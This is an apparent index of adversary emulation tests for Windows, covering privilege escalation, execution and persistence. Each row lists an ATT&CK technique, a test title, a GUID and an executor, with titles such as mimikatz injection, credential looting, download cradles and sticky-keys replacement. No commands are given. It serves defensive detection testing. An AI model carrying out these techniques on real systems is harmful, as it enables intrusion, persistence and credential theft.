446 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 4 Suspicious vbs file run from startup Folder 2cb98256-625e-4da9-9d44-f2e5f90b8bd5 powershell
447 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 5 Suspicious jse file run from startup Folder dade9447-791e-4c8f-b04b-3a35855dfa06 powershell
448 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 6 Suspicious bat file run from startup Folder 5b6768e4-44d2-44f0-89da-a01d1430fd5e powershell
449 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 7 Add Executable Shortcut Link to User Startup Folder 24e55612-85f6-4bd6-ae74-a73d02e3441d powershell
450 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 8 Add persistance via Recycle bin bda6a3d6-7aa7-4e89-908b-306772e9662f command_prompt
451 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 9 SystemBC Malware-as-a-Service Registry 9dc7767b-30c1-4cc4-b999-50cab5e27891 powershell
452 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 10 Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value acfef903-7662-447e-a391-9c91c2f00f7b powershell
453 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 11 Change Startup Folder - HKCU Modify User Shell Folders Startup Value 8834b65a-f808-4ece-ad7e-2acdf647aafa powershell
454 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 12 HKCU - Policy Settings Explorer Run Key a70faea1-e206-4f6f-8d9a-67379be8f6f1 powershell
455 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 13 HKLM - Policy Settings Explorer Run Key b5c9a9bc-dda3-4ea0-b16a-add8e81ab75f powershell
456 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 14 HKLM - Append Command to Winlogon Userinit KEY Value f7fab6cc-8ece-4ca7-a0f1-30a22fccd374 powershell
457 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 15 HKLM - Modify default System Shell - Winlogon Shell KEY Value 1d958c61-09c6-4d9e-b26b-4130314e520e powershell
458 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 16 secedit used to create a Run key in the HKLM Hive 14fdc3f1-6fc3-4556-8d36-aa89d9d42d02 command_prompt
459 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 17 Modify BootExecute Value befc2b40-d487-4a5a-8813-c11085fb5672 powershell
460 privilege-escalation T1055.012 Process Injection: Process Hollowing 1 Process Hollowing using PowerShell 562427b4-39ef-4e8c-af88-463a78e70b9c powershell
461 privilege-escalation T1055.012 Process Injection: Process Hollowing 2 RunPE via VBA 3ad4a037-1598-4136-837c-4027e4fa319b powershell
462 privilege-escalation T1546 Event Triggered Execution 1 Persistence with Custom AutodialDLL aca9ae16-7425-4b6d-8c30-cad306fdbd5b powershell
463 privilege-escalation T1546 Event Triggered Execution 2 HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) a574dafe-a903-4cce-9701-14040f4f3532 powershell
464 privilege-escalation T1546 Event Triggered Execution 3 HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation) 36b8dbf9-59b1-4e9b-a3bb-36e80563ef01 powershell
465 privilege-escalation T1546 Event Triggered Execution 4 WMI Invoke-CimMethod Start Process adae83d3-0df6-45e7-b2c3-575f91584577 powershell
466 privilege-escalation T1134.005 Access Token Manipulation: SID-History Injection 1 Injection SID-History with mimikatz 6bef32e5-9456-4072-8f14-35566fb85401 command_prompt
467 privilege-escalation T1547.002 Authentication Package 1 Authentication Package be2590e8-4ac3-47ac-b4b5-945820f2fbe9 powershell
468 privilege-escalation T1546.015 Event Triggered Execution: Component Object Model Hijacking 1 COM Hijacking - InprocServer32 48117158-d7be-441b-bc6a-d9e36e47b52b powershell
469 privilege-escalation T1546.015 Event Triggered Execution: Component Object Model Hijacking 2 Powershell Execute COM Object 752191b1-7c71-445c-9dbe-21bb031b18eb powershell
470 privilege-escalation T1546.015 Event Triggered Execution: Component Object Model Hijacking 3 COM Hijacking with RunDLL32 (Local Server Switch) 123520cc-e998-471b-a920-bd28e3feafa0 powershell
471 privilege-escalation T1546.015 Event Triggered Execution: Component Object Model Hijacking 4 COM hijacking via TreatAs 33eacead-f117-4863-8eb0-5c6304fbfaa9 powershell
472 privilege-escalation T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path 1 Execution of program.exe as service with unquoted service path 2770dea7-c50f-457b-84c4-c40a47460d9f command_prompt
473 privilege-escalation T1546.010 Event Triggered Execution: AppInit DLLs 1 Install AppInit Shim a58d9386-3080-4242-ab5f-454c16503d18 command_prompt
474 privilege-escalation T1546.002 Event Triggered Execution: Screensaver 1 Set Arbitrary Binary as Screensaver 281201e7-de41-4dc9-b73d-f288938cbb64 command_prompt
475 privilege-escalation T1574.002 Hijack Execution Flow: DLL Side-Loading 1 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
476 privilege-escalation T1574.002 Hijack Execution Flow: DLL Side-Loading 2 DLL Side-Loading using the dotnet startup hook environment variable d322cdd7-7d60-46e3-9111-648848da7c02 command_prompt
477 privilege-escalation T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows) 1 Logon Scripts d6042746-07d4-4c92-9ad8-e644c114a231 command_prompt
478 privilege-escalation T1547.008 Boot or Logon Autostart Execution: LSASS Driver 1 Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt 8ecef16d-d289-46b4-917b-0dba6dc81cf1 powershell
479 privilege-escalation T1053.002 Scheduled Task/Job: At 1 At.exe Scheduled task 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 command_prompt
480 privilege-escalation T1055.001 Process Injection: Dynamic-link Library Injection 1 Process Injection via mavinject.exe 74496461-11a1-4982-b439-4d87a550d254 powershell
481 privilege-escalation T1055.001 Process Injection: Dynamic-link Library Injection 2 WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique 8b56f787-73d9-4f1d-87e8-d07e89cbc7f5 powershell
482 privilege-escalation T1546.007 Event Triggered Execution: Netsh Helper DLL 1 Netsh Helper DLL Registration 3244697d-5a3a-4dfc-941c-550f69f91a4d command_prompt
483 privilege-escalation T1078.003 Valid Accounts: Local Accounts 1 Create local account with admin privileges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
484 privilege-escalation T1078.003 Valid Accounts: Local Accounts 6 WinPwn - Loot local Credentials - powerhell kittie 9e9fd066-453d-442f-88c1-ad7911d32912 powershell
485 privilege-escalation T1078.003 Valid Accounts: Local Accounts 7 WinPwn - Loot local Credentials - Safetykatz e9fdb899-a980-4ba4-934b-486ad22e22f4 powershell
486 privilege-escalation T1574.012 Hijack Execution Flow: COR_PROFILER 1 User scope COR_PROFILER 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a powershell
487 privilege-escalation T1574.012 Hijack Execution Flow: COR_PROFILER 2 System Scope COR_PROFILER f373b482-48c8-4ce4-85ed-d40c8b3f7310 powershell
488 privilege-escalation T1574.012 Hijack Execution Flow: COR_PROFILER 3 Registry-free process scope COR_PROFILER 79d57242-bbef-41db-b301-9d01d9f6e817 powershell
489 execution T1053.005 Scheduled Task/Job: Scheduled Task 1 Scheduled Task Startup Script fec27f65-db86-4c2d-b66c-61945aee87c2 command_prompt
490 execution T1053.005 Scheduled Task/Job: Scheduled Task 2 Scheduled task Local 42f53695-ad4a-4546-abb6-7d837f644a71 command_prompt
491 execution T1053.005 Scheduled Task/Job: Scheduled Task 3 Scheduled task Remote 2e5eac3e-327b-4a88-a0c0-c4057039a8dd command_prompt
492 execution T1053.005 Scheduled Task/Job: Scheduled Task 4 Powershell Cmdlet Scheduled Task af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd powershell
493 execution T1053.005 Scheduled Task/Job: Scheduled Task 5 Task Scheduler via VBA ecd3fa21-7792-41a2-8726-2c5c673414d3 powershell
494 execution T1053.005 Scheduled Task/Job: Scheduled Task 6 WMI Invoke-CimMethod Scheduled Task e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b powershell
495 execution T1053.005 Scheduled Task/Job: Scheduled Task 7 Scheduled Task Executing Base64 Encoded Commands From Registry e895677d-4f06-49ab-91b6-ae3742d0a2ba command_prompt
496 execution T1053.005 Scheduled Task/Job: Scheduled Task 8 Import XML Schedule Task with Hidden Attribute cd925593-fbb4-486d-8def-16cbdf944bf4 powershell
497 execution T1053.005 Scheduled Task/Job: Scheduled Task 9 PowerShell Modify A Scheduled Task dda6fc7b-c9a6-4c18-b98d-95ec6542af6d powershell
498 execution T1047 Windows Management Instrumentation 1 WMI Reconnaissance Users c107778c-dcf5-47c5-af2e-1d058a3df3ea command_prompt
499 execution T1047 Windows Management Instrumentation 2 WMI Reconnaissance Processes 5750aa16-0e59-4410-8b9a-8a47ca2788e2 command_prompt
500 execution T1047 Windows Management Instrumentation 3 WMI Reconnaissance Software 718aebaa-d0e0-471a-8241-c5afa69c7414 command_prompt
501 execution T1047 Windows Management Instrumentation 4 WMI Reconnaissance List Remote Services 0fd48ef7-d890-4e93-a533-f7dedd5191d3 command_prompt
502 execution T1047 Windows Management Instrumentation 5 WMI Execute Local Process b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3 command_prompt
503 execution T1047 Windows Management Instrumentation 6 WMI Execute Remote Process 9c8ef159-c666-472f-9874-90c8d60d136b command_prompt
504 execution T1047 Windows Management Instrumentation 7 Create a Process using WMI Query and an Encoded Command 7db7a7f9-9531-4840-9b30-46220135441c command_prompt
505 execution T1047 Windows Management Instrumentation 8 Create a Process using obfuscated Win32_Process 10447c83-fc38-462a-a936-5102363b1c43 powershell
506 execution T1047 Windows Management Instrumentation 9 WMI Execute rundll32 00738d2a-4651-4d76-adf2-c43a41dfb243 powershell
507 execution T1047 Windows Management Instrumentation 10 Application uninstall using WMIC c510d25b-1667-467d-8331-a56d3e9bc4ff command_prompt
508 execution T1059.007 Command and Scripting Interpreter: JavaScript 1 JScript execution to gather local computer information via cscript 01d75adf-ca1b-4dd1-ac96-7c9550ad1035 command_prompt
509 execution T1059.007 Command and Scripting Interpreter: JavaScript 2 JScript execution to gather local computer information via wscript 0709945e-4fec-4c49-9faf-c3c292a74484 command_prompt
510 execution T1559.002 Inter-Process Communication: Dynamic Data Exchange 1 Execute Commands f592ba2a-e9e8-4d62-a459-ef63abd819fd manual
511 execution T1559.002 Inter-Process Communication: Dynamic Data Exchange 2 Execute PowerShell script via Word DDE 47c21fb6-085e-4b0d-b4d2-26d72c3830b3 command_prompt
512 execution T1559.002 Inter-Process Communication: Dynamic Data Exchange 3 DDEAUTO cf91174c-4e74-414e-bec0-8d60a104d181 manual
513 execution T1204.002 User Execution: Malicious File 1 OSTap Style Macro Execution 8bebc690-18c7-4549-bc98-210f7019efff powershell
514 execution T1204.002 User Execution: Malicious File 2 OSTap Payload Download 3f3af983-118a-4fa1-85d3-ba4daa739d80 command_prompt
515 execution T1204.002 User Execution: Malicious File 3 Maldoc choice flags command execution 0330a5d2-a45a-4272-a9ee-e364411c4b18 powershell
516 execution T1204.002 User Execution: Malicious File 4 OSTAP JS version add560ef-20d6-4011-a937-2c340f930911 powershell
517 execution T1204.002 User Execution: Malicious File 5 Office launching .bat file from AppData 9215ea92-1ded-41b7-9cd6-79f9a78397aa powershell
518 execution T1204.002 User Execution: Malicious File 6 Excel 4 Macro 4ea1fc97-8a46-4b4e-ba48-af43d2a98052 powershell
519 execution T1204.002 User Execution: Malicious File 7 Headless Chrome code execution via VBA a19ee671-ed98-4e9d-b19c-d1954a51585a powershell
520 execution T1204.002 User Execution: Malicious File 8 Potentially Unwanted Applications (PUA) 02f35d62-9fdc-4a97-b899-a5d9a876d295 powershell
521 execution T1204.002 User Execution: Malicious File 9 Office Generic Payload Download 5202ee05-c420-4148-bf5e-fd7f7d24850c powershell
522 execution T1204.002 User Execution: Malicious File 10 LNK Payload Download 581d7521-9c4b-420e-9695-2aec5241167f powershell
523 execution T1204.002 User Execution: Malicious File 11 Mirror Blast Emulation 24fd9719-7419-42dd-bce6-ab3463110b3c powershell
524 execution T1106 Native API 1 Execution through API - CreateProcess 99be2089-c52d-4a4a-b5c3-261ee42c8b62 command_prompt
525 execution T1106 Native API 2 WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique ce4e76e6-de70-4392-9efe-b281fc2b4087 powershell
526 execution T1106 Native API 3 WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique 7ec5b74e-8289-4ff2-a162-b6f286a33abd powershell
527 execution T1106 Native API 4 WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique e1f93a06-1649-4f07-89a8-f57279a7d60e powershell
528 execution T1072 Software Deployment Tools 1 Radmin Viewer Utility b4988cad-6ed2-434d-ace5-ea2670782129 command_prompt
529 execution T1072 Software Deployment Tools 2 PDQ Deploy RAT e447b83b-a698-4feb-bed1-a7aaf45c3443 command_prompt
530 execution T1059.001 Command and Scripting Interpreter: PowerShell 1 Mimikatz f3132740-55bc-48c4-bcc0-758a459cd027 command_prompt
531 execution T1059.001 Command and Scripting Interpreter: PowerShell 2 Run BloodHound from local disk a21bb23e-e677-4ee7-af90-6931b57b6350 powershell
532 execution T1059.001 Command and Scripting Interpreter: PowerShell 3 Run Bloodhound from Memory using Download Cradle bf8c1441-4674-4dab-8e4e-39d93d08f9b7 powershell
533 execution T1059.001 Command and Scripting Interpreter: PowerShell 4 Obfuscation Tests 4297c41a-8168-4138-972d-01f3ee92c804 powershell
534 execution T1059.001 Command and Scripting Interpreter: PowerShell 5 Mimikatz - Cradlecraft PsSendKeys af1800cf-9f9d-4fd1-a709-14b1e6de020d powershell
535 execution T1059.001 Command and Scripting Interpreter: PowerShell 6 Invoke-AppPathBypass 06a220b6-7e29-4bd8-9d07-5b4d86742372 command_prompt
536 execution T1059.001 Command and Scripting Interpreter: PowerShell 7 Powershell MsXml COM object - with prompt 388a7340-dbc1-4c9d-8e59-b75ad8c6d5da command_prompt
537 execution T1059.001 Command and Scripting Interpreter: PowerShell 8 Powershell XML requests 4396927f-e503-427b-b023-31049b9b09a6 command_prompt
538 execution T1059.001 Command and Scripting Interpreter: PowerShell 9 Powershell invoke mshta.exe download 8a2ad40b-12c7-4b25-8521-2737b0a415af command_prompt
539 execution T1059.001 Command and Scripting Interpreter: PowerShell 10 Powershell Invoke-DownloadCradle cc50fa2a-a4be-42af-a88f-e347ba0bf4d7 manual
540 execution T1059.001 Command and Scripting Interpreter: PowerShell 11 PowerShell Fileless Script Execution fa050f5e-bc75-4230-af73-b6fd7852cd73 powershell
541 execution T1059.001 Command and Scripting Interpreter: PowerShell 12 PowerShell Downgrade Attack 9148e7c4-9356-420e-a416-e896e9c0f73e powershell
542 execution T1059.001 Command and Scripting Interpreter: PowerShell 13 NTFS Alternate Data Stream Access 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680 powershell
543 execution T1059.001 Command and Scripting Interpreter: PowerShell 14 PowerShell Session Creation and Use 7c1acec2-78fa-4305-a3e0-db2a54cddecd powershell
544 execution T1059.001 Command and Scripting Interpreter: PowerShell 15 ATHPowerShellCommandLineParameter -Command parameter variations 686a9785-f99b-41d4-90df-66ed515f81d7 powershell
545 execution T1059.001 Command and Scripting Interpreter: PowerShell 16 ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments 1c0a870f-dc74-49cf-9afc-eccc45e58790 powershell
546 execution T1059.001 Command and Scripting Interpreter: PowerShell 17 ATHPowerShellCommandLineParameter -EncodedCommand parameter variations 86a43bad-12e3-4e85-b97c-4d5cf25b95c3 powershell
547 execution T1059.001 Command and Scripting Interpreter: PowerShell 18 ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments 0d181431-ddf3-4826-8055-2dbf63ae848b powershell
548 execution T1059.001 Command and Scripting Interpreter: PowerShell 19 PowerShell Command Execution a538de64-1c74-46ed-aa60-b995ed302598 command_prompt
549 execution T1059.001 Command and Scripting Interpreter: PowerShell 20 PowerShell Invoke Known Malicious Cmdlets 49eb9404-5e0f-4031-a179-b40f7be385e3 powershell
550 execution T1059.001 Command and Scripting Interpreter: PowerShell 21 PowerUp Invoke-AllChecks 1289f78d-22d2-4590-ac76-166737e1811b powershell
551 execution T1059.001 Command and Scripting Interpreter: PowerShell 22 Abuse Nslookup with DNS Records 999bff6d-dc15-44c9-9f5c-e1051bfc86e1 powershell
552 execution T1559 Inter-Process Communication 1 Cobalt Strike Artifact Kit pipe bd13b9fc-b758-496a-b81a-397462f82c72 command_prompt
553 execution T1559 Inter-Process Communication 2 Cobalt Strike Lateral Movement (psexec_psh) pipe 830c8b6c-7a70-4f40-b975-8bbe74558acd command_prompt
554 execution T1559 Inter-Process Communication 3 Cobalt Strike SSH (postex_ssh) pipe d1f72fa0-5bc2-4b4b-bd1e-43b6e8cfb2e6 command_prompt
555 execution T1559 Inter-Process Communication 4 Cobalt Strike post-exploitation pipe (4.2 and later) 7a48f482-246f-4aeb-9837-21c271ebf244 command_prompt
556 execution T1559 Inter-Process Communication 5 Cobalt Strike post-exploitation pipe (before 4.2) 8dbfc15c-527b-4ab0-a272-019f469d367f command_prompt
557 execution T1059.003 Command and Scripting Interpreter: Windows Command Shell 1 Create and Execute Batch Script 9e8894c0-50bd-4525-a96c-d4ac78ece388 powershell
558 execution T1059.003 Command and Scripting Interpreter: Windows Command Shell 2 Writes text to a file and displays it. 127b4afe-2346-4192-815c-69042bec570e command_prompt
559 execution T1059.003 Command and Scripting Interpreter: Windows Command Shell 3 Suspicious Execution via Windows Command Shell d0eb3597-a1b3-4d65-b33b-2cda8d397f20 command_prompt
560 execution T1059.003 Command and Scripting Interpreter: Windows Command Shell 4 Simulate BlackByte Ransomware Print Bombing 6b2903ac-8f36-450d-9ad5-b220e8a2dcb9 powershell
561 execution T1059.003 Command and Scripting Interpreter: Windows Command Shell 5 Command Prompt read contents from CMD file and execute df81db1b-066c-4802-9bc8-b6d030c3ba8e command_prompt
562 execution T1059.005 Command and Scripting Interpreter: Visual Basic 1 Visual Basic script execution to gather local computer information 1620de42-160a-4fe5-bbaf-d3fef0181ce9 powershell
563 execution T1059.005 Command and Scripting Interpreter: Visual Basic 2 Encoded VBS code execution e8209d5f-e42d-45e6-9c2f-633ac4f1eefa powershell
564 execution T1059.005 Command and Scripting Interpreter: Visual Basic 3 Extract Memory via VBA 8faff437-a114-4547-9a60-749652a03df6 powershell
565 execution T1569.002 System Services: Service Execution 1 Execute a Command as a Service 2382dee2-a75f-49aa-9378-f52df6ed3fb1 command_prompt
566 execution T1569.002 System Services: Service Execution 2 Use PsExec to execute a command on a remote host 873106b7-cfed-454b-8680-fa9f6400431c command_prompt
567 execution T1569.002 System Services: Service Execution 4 BlackCat pre-encryption cmds with Lateral Movement 31eb7828-97d7-4067-9c1e-c6feb85edc4b powershell
568 execution T1569.002 System Services: Service Execution 5 Use RemCom to execute a command on a remote host a5d8cdeb-be90-43a9-8b26-cc618deac1e0 command_prompt
569 execution T1569.002 System Services: Service Execution 6 Snake Malware Service Create b8db787e-dbea-493c-96cb-9272296ddc49 command_prompt
570 execution T1053.002 Scheduled Task/Job: At 1 At.exe Scheduled task 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 command_prompt
571 persistence T1053.005 Scheduled Task/Job: Scheduled Task 1 Scheduled Task Startup Script fec27f65-db86-4c2d-b66c-61945aee87c2 command_prompt
572 persistence T1053.005 Scheduled Task/Job: Scheduled Task 2 Scheduled task Local 42f53695-ad4a-4546-abb6-7d837f644a71 command_prompt
573 persistence T1053.005 Scheduled Task/Job: Scheduled Task 3 Scheduled task Remote 2e5eac3e-327b-4a88-a0c0-c4057039a8dd command_prompt
574 persistence T1053.005 Scheduled Task/Job: Scheduled Task 4 Powershell Cmdlet Scheduled Task af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd powershell
575 persistence T1053.005 Scheduled Task/Job: Scheduled Task 5 Task Scheduler via VBA ecd3fa21-7792-41a2-8726-2c5c673414d3 powershell
576 persistence T1053.005 Scheduled Task/Job: Scheduled Task 6 WMI Invoke-CimMethod Scheduled Task e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b powershell
577 persistence T1053.005 Scheduled Task/Job: Scheduled Task 7 Scheduled Task Executing Base64 Encoded Commands From Registry e895677d-4f06-49ab-91b6-ae3742d0a2ba command_prompt
578 persistence T1053.005 Scheduled Task/Job: Scheduled Task 8 Import XML Schedule Task with Hidden Attribute cd925593-fbb4-486d-8def-16cbdf944bf4 powershell
579 persistence T1053.005 Scheduled Task/Job: Scheduled Task 9 PowerShell Modify A Scheduled Task dda6fc7b-c9a6-4c18-b98d-95ec6542af6d powershell
580 persistence T1546.013 Event Triggered Execution: PowerShell Profile 1 Append malicious start-process cmdlet 090e5aa5-32b6-473b-a49b-21e843a56896 powershell
581 persistence T1133 External Remote Services 1 Running Chrome VPN Extensions via the Registry 2 vpn extension 4c8db261-a58b-42a6-a866-0a294deedde4 powershell
582 persistence T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness 1 Service Registry Permissions Weakness f7536d63-7fd4-466f-89da-7e48d550752a powershell
583 persistence T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness 2 Service ImagePath Change with reg.exe f38e9eea-e1d7-4ba6-b716-584791963827 command_prompt
584 persistence T1547 Boot or Logon Autostart Execution 1 Add a driver cb01b3da-b0e7-4e24-bf6d-de5223526785 command_prompt
585 persistence T1547.014 Active Setup 1 HKLM - Add atomic_test key to launch executable as part of user setup deff4586-0517-49c2-981d-bbea24d48d71 powershell
586 persistence T1547.014 Active Setup 2 HKLM - Add malicious StubPath value to existing Active Setup Entry 39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a powershell
587 persistence T1547.014 Active Setup 3 HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number 04d55cef-f283-40ba-ae2a-316bc3b5e78c powershell
588 persistence T1543.003 Create or Modify System Process: Windows Service 1 Modify Fax service to run PowerShell ed366cde-7d12-49df-a833-671904770b9f command_prompt
589 persistence T1543.003 Create or Modify System Process: Windows Service 2 Service Installation CMD 981e2942-e433-44e9-afc1-8c957a1496b6 command_prompt
590 persistence T1543.003 Create or Modify System Process: Windows Service 3 Service Installation PowerShell 491a4af6-a521-4b74-b23b-f7b3f1ee9e77 powershell
591 persistence T1543.003 Create or Modify System Process: Windows Service 4 TinyTurla backdoor service w64time ef0581fd-528e-4662-87bc-4c2affb86940 command_prompt
592 persistence T1543.003 Create or Modify System Process: Windows Service 5 Remote Service Installation CMD fb4151a2-db33-4f8c-b7f8-78ea8790f961 command_prompt
593 persistence T1137 Office Application Startup 1 Office Application Startup - Outlook as a C2 bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c command_prompt
594 persistence T1574.001 Hijack Execution Flow: DLL Search Order Hijacking 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
595 persistence T1137.006 Office Application Startup: Add-ins 1 Code Executed Via Excel Add-in File (XLL) 441b1a0f-a771-428a-8af0-e99e4698cda3 powershell
596 persistence T1137.006 Office Application Startup: Add-ins 2 Persistent Code Execution Via Excel Add-in File (XLL) 9c307886-9fef-41d5-b344-073a0f5b2f5f powershell
597 persistence T1137.006 Office Application Startup: Add-ins 3 Persistent Code Execution Via Word Add-in File (WLL) 95408a99-4fa7-4cd6-a7ef-cb65f86351cf powershell
598 persistence T1137.006 Office Application Startup: Add-ins 4 Persistent Code Execution Via Excel VBA Add-in File (XLAM) 082141ed-b048-4c86-99c7-2b8da5b5bf48 powershell
599 persistence T1137.006 Office Application Startup: Add-ins 5 Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM) f89e58f9-2b49-423b-ac95-1f3e7cfd8277 powershell
600 persistence T1505.002 Server Software Component: Transport Agent 1 Install MS Exchange Transport Agent Persistence 43e92449-ff60-46e9-83a3-1a38089df94d powershell
601 persistence T1556.002 Modify Authentication Process: Password Filter DLL 1 Install and Register Password Filter DLL a7961770-beb5-4134-9674-83d7e1fa865c powershell
602 persistence T1505.005 Server Software Component: Terminal Services DLL 1 Simulate Patching termsrv.dll 0b2eadeb-4a64-4449-9d43-3d999f4a317b powershell
603 persistence T1176 Browser Extensions 1 Chrome (Developer Mode) 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 manual
604 persistence T1176 Browser Extensions 2 Chrome (Chrome Web Store) 4c83940d-8ca5-4bb2-8100-f46dc914bc3f manual
605 persistence T1176 Browser Extensions 3 Firefox cb790029-17e6-4c43-b96f-002ce5f10938 manual
606 persistence T1176 Browser Extensions 4 Edge Chromium Addon - VPN 3d456e2b-a7db-4af8-b5b3-720e7c4d9da5 manual
607 persistence T1176 Browser Extensions 5 Google Chrome Load Unpacked Extension With Command Line 7a714703-9f6b-461c-b06d-e6aeac650f27 powershell
608 persistence T1546.011 Event Triggered Execution: Application Shimming 1 Application Shim Installation 9ab27e22-ee62-4211-962b-d36d9a0e6a18 command_prompt
609 persistence T1546.011 Event Triggered Execution: Application Shimming 2 New shim database files created in the default shim database directory aefd6866-d753-431f-a7a4-215ca7e3f13d powershell
610 persistence T1546.011 Event Triggered Execution: Application Shimming 3 Registry key creation and/or modification events for SDB 9b6a06f9-ab5e-4e8d-8289-1df4289db02f powershell
611 persistence T1547.010 Boot or Logon Autostart Execution: Port Monitors 1 Add Port Monitor persistence in Registry d34ef297-f178-4462-871e-9ce618d44e50 command_prompt
612 persistence T1547.009 Boot or Logon Autostart Execution: Shortcut Modification 1 Shortcut Modification ce4fc678-364f-4282-af16-2fb4c78005ce command_prompt
613 persistence T1547.009 Boot or Logon Autostart Execution: Shortcut Modification 2 Create shortcut to cmd in startup folders cfdc954d-4bb0-4027-875b-a1893ce406f2 powershell
614 persistence T1547.005 Boot or Logon Autostart Execution: Security Support Provider 1 Modify SSP configuration in registry afdfd7e3-8a0b-409f-85f7-886fdf249c9e powershell
615 persistence T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking 1 powerShell Persistence via hijacking default modules - Get-Variable.exe 1561de08-0b4b-498e-8261-e922f3494aae powershell
616 persistence T1505.003 Server Software Component: Web Shell 1 Web Shell Written to Disk 0a2ce662-1efa-496f-a472-2fe7b080db16 command_prompt
617 persistence T1078.001 Valid Accounts: Default Accounts 1 Enable Guest account with RDP capability and admin privileges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
618 persistence T1078.001 Valid Accounts: Default Accounts 2 Activate Guest Account aa6cb8c4-b582-4f8e-b677-37733914abda command_prompt
619 persistence T1547.003 Time Providers 1 Create a new time provider df1efab7-bc6d-4b88-8be9-91f55ae017aa powershell
620 persistence T1547.003 Time Providers 2 Edit an existing time provider 29e0afca-8d1d-471a-8d34-25512fc48315 powershell
621 persistence T1136.001 Create Account: Local Account 3 Create a new user in a command prompt 6657864e-0323-4206-9344-ac9cd7265a4f command_prompt
622 persistence T1136.001 Create Account: Local Account 4 Create a new user in PowerShell bc8be0ac-475c-4fbf-9b1d-9fffd77afbde powershell
623 persistence T1136.001 Create Account: Local Account 6 Create a new Windows admin user fda74566-a604-4581-a4cc-fbbe21d66559 command_prompt
624 persistence T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 1 Winlogon Shell Key Persistence - PowerShell bf9f9d65-ee4d-4c3e-a843-777d04f19c38 powershell
625 persistence T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 2 Winlogon Userinit Key Persistence - PowerShell fb32c935-ee2e-454b-8fa3-1c46b42e8dfb powershell
626 persistence T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 3 Winlogon Notify Key Logon Persistence - PowerShell d40da266-e073-4e5a-bb8b-2b385023e5f9 powershell
627 persistence T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 4 Winlogon HKLM Shell Key Persistence - PowerShell 95a3c42f-8c88-4952-ad60-13b81d929a9d powershell
628 persistence T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 5 Winlogon HKLM Userinit Key Persistence - PowerShell f9b8daff-8fa7-4e6a-a1a7-7c14675a545b powershell
629 persistence T1546.012 Event Triggered Execution: Image File Execution Options Injection 1 IFEO Add Debugger fdda2626-5234-4c90-b163-60849a24c0b8 command_prompt
630 persistence T1546.012 Event Triggered Execution: Image File Execution Options Injection 2 IFEO Global Flags 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 command_prompt
631 persistence T1546.012 Event Triggered Execution: Image File Execution Options Injection 3 GlobalFlags in Image File Execution Options 13117939-c9b2-4a43-999e-0a543df92f0d powershell
632 persistence T1546.008 Event Triggered Execution: Accessibility Features 1 Attaches Command Prompt as a Debugger to a List of Target Processes 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 powershell
633 persistence T1546.008 Event Triggered Execution: Accessibility Features 2 Replace binary of sticky keys 934e90cf-29ca-48b3-863c-411737ad44e3 command_prompt
634 persistence T1546.008 Event Triggered Execution: Accessibility Features 3 Create Symbolic Link From osk.exe to cmd.exe 51ef369c-5e87-4f33-88cd-6d61be63edf2 command_prompt
635 persistence T1136.002 Create Account: Domain Account 1 Create a new Windows domain admin user fcec2963-9951-4173-9bfa-98d8b7834e62 command_prompt
636 persistence T1136.002 Create Account: Domain Account 2 Create a new account similar to ANONYMOUS LOGON dc7726d2-8ccb-4cc6-af22-0d5afb53a548 command_prompt
